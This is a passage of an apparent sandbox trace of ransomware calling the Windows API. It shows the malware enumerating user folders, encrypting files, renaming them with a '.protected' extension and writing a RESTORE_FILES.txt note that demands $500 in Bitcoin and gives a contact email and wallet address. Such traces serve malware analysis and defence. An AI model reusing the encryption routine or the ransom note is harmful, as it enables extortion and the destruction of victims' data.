halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected")) returned 1 [0090.334] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="Windows") returned -1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="Program Files") returned -1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="Program Files (x86)") returned -1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="$Recycle.bin") returned 1 
[0090.334] lstrcmpiW (lpString1="Preferred", lpString2="System Volume Information") returned -1 [0090.334] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0090.334] StrStrIW (lpFirst="Preferred", lpSrch=".protected") returned 0x0 [0090.334] lstrcmpW (lpString1="Preferred", lpString2="RESTORE_FILES.txt") returned -1 [0090.334] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.334] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0090.334] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0090.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0090.334] StrStrW (lpFirst="Preferred", lpSrch=".rar") returned 0x0 [0090.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0090.334] StrStrW 
(lpFirst="Preferred", lpSrch=".zip") returned 0x0 [0090.334] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0090.335] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.335] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0090.335] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.335] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.335] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.335] CloseHandle (hObject=0x150) returned 1 [0090.335] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.protected") returned 133 [0090.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.protected")) returned 1 [0090.336] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.336] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.336] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RESTORE_FILES.txt") returned 131 [0090.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.336] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.336] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.337] lstrlenA (lpString="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") returned 684 [0090.337] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.337] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.337] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.337] CloseHandle (hObject=0x14c) returned 1 [0090.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Windows") returned -1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Program Files") returned 1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Program Files (x86)") returned 1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="$Recycle.bin") returned 1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="System Volume Information") returned -1 [0090.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 114 [0090.338] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0090.338] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0090.338] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned 116 [0090.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.338] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.338] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.338] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.338] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.338] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.338] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.") returned 116 [0090.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.338] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.339] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.339] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.339] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.339] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.339] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.339] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.339] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\..") returned 117 [0090.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.339] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.339] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.339] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="Windows") returned -1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="Program Files") returned -1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="Program Files (x86)") returned -1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="$Recycle.bin") returned 1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="System Volume Information") returned -1 [0090.339] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0090.339] StrStrIW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".protected") returned 0x0 [0090.339] lstrcmpW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="RESTORE_FILES.txt") returned -1 [0090.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.341] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0090.341] StrStrW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".txt") returned 0x0 [0090.341] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0090.341] StrStrW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".rar") returned 0x0 [0090.341] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0090.341] StrStrW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".zip") returned 0x0 [0090.341] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.341] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.341] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.342] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.342] 
WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.342] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.342] CloseHandle (hObject=0x150) returned 1 [0090.342] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.protected") returned 161 [0090.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.protected")) returned 1 [0090.343] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="Windows") returned -1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="Program Files") returned -1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="Program Files (x86)") returned -1 
[0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="$Recycle.bin") returned 1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="System Volume Information") returned -1 [0090.343] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0090.344] StrStrIW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".protected") returned 0x0 [0090.344] lstrcmpW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="RESTORE_FILES.txt") returned -1 [0090.344] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.344] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0090.344] StrStrW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".txt") returned 0x0 [0090.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0090.344] StrStrW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".rar") returned 0x0 [0090.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0090.344] StrStrW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".zip") returned 0x0 [0090.344] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.345] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.345] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.345] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.345] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.346] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.346] CloseHandle (hObject=0x150) returned 1 [0090.346] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.protected") returned 161 [0090.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.protected")) returned 1 [0090.347] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="Windows") returned -1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="Program Files") returned -1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="Program Files (x86)") returned -1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="$Recycle.bin") returned 1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="System Volume Information") returned -1 [0090.347] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0090.347] StrStrIW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpSrch=".protected") returned 0x0 [0090.347] lstrcmpW 
